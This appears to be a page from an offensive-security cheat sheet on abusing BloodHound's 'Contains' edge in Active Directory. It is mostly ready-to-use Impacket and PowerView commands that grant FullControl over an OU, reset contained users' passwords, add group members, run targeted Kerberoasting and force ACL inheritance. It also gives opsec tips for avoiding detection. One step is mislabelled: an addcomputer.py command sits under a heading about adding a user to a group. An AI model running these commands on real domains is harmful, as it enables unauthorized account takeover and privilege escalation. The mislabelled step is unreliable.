🐚 GTFOBins πŸͺŸ LOLBAS πŸ’Ύ Compiled Binaries 🩸 BloodHound 🩸 bloodyAD πŸ“œ Certipy ☁️ Cloud ⚑ goexec πŸ€– HackTricks πŸ”Œ HardwareATT πŸ“¦ Impacket 🏰 InternalATT πŸ”€ Ligolo-ng 🐱 Mimikatz πŸ’£ msfvenom πŸ”§ NetExec πŸ€– OSAI πŸ’₯ PATT 🍳 Recipes 🎟️ Rubeus 🐍 Sliver
🩸 BloodHound / Contains

Contains

An OU or Domain contains (is the parent of) the target object. When combined with write access over the OU, ACL inheritance enables attacks on all contained objects.

Applies to: Domain/OU β†’ User/Group/Computer/OU

Note

Contains is structural. It becomes an abuse path when you have GenericAll, WriteDACL, or GenericWrite on the OU β€” changes to the OU ACL inherit down to all contained objects.

Linux Abuse

Add ACE to OU DACL β€” grant yourself GenericAll on all contained objects

# Using dacledit.py (impacket)
dacledit.py -action write -rights FullControl -principal <username> -target-dn 'OU=<ou-name>,DC=<domain>,DC=<tld>' '<domain>/<username>:<password>' -dc-ip <dc-ip>

Verify ACE written

dacledit.py -action read -target-dn 'OU=<ou-name>,DC=<domain>,DC=<tld>' '<domain>/<username>:<password>' -dc-ip <dc-ip>

Reset password of user in OU (after inheriting GenericAll)

changepasswd.py -newpass '<new-password>' '<domain>/<username>:<password>'@<dc-ip> -target '<domain>/<target-user>'

Add owned user to group (after inheriting GenericAll over group in OU)

addcomputer.py -computer-name '<computer-name>$' -computer-pass '<password>' -dc-ip <dc-ip> '<domain>/<username>:<password>'

Targeted Kerberoast user in OU (after setting SPN via GenericWrite)

targetedKerberoast.py -d <domain> -u <username> -p '<password>' --dc-ip <dc-ip>

Windows Abuse

Add ACE granting GenericAll on OU (PowerView)

Add-DomainObjectAcl -TargetIdentity '<ou-name>' -PrincipalIdentity <username> -Rights All -Verbose

Confirm ACL inheritance is enabled on OU objects

Get-DomainObjectAcl -Identity '<ou-name>' -ResolveGUIDs | Where-Object {$_.SecurityIdentifier -match '<sid>'}

Reset contained user password after ACL inheritance

$cred = New-Object System.Management.Automation.PSCredential('<domain>\<username>', (ConvertTo-SecureString '<password>' -AsPlainText -Force))
Set-DomainUserPassword -Identity <target-user> -AccountPassword (ConvertTo-SecureString '<new-password>' -AsPlainText -Force) -Credential $cred

Add user to group after ACL inheritance

Add-DomainGroupMember -Identity '<group-name>' -Members '<username>' -Credential $cred

Enable ACL inheritance on all objects in OU (if blocked)

Get-ADObject -Filter * -SearchBase 'OU=<ou-name>,DC=<domain>,DC=<tld>' | ForEach-Object {
    $acl = Get-Acl -Path "AD:\$($_.DistinguishedName)"
    $acl.SetAccessRuleProtection($false, $true)
    Set-Acl -Path "AD:\$($_.DistinguishedName)" -AclObject $acl
}

Opsec

  • Writing ACEs to OU generates Event ID 5136 (directory service object modified)
  • ACL inheritance propagation is not immediate β€” may take seconds to minutes
  • Prefer targeting specific objects over blanket OU ACL modification to reduce noise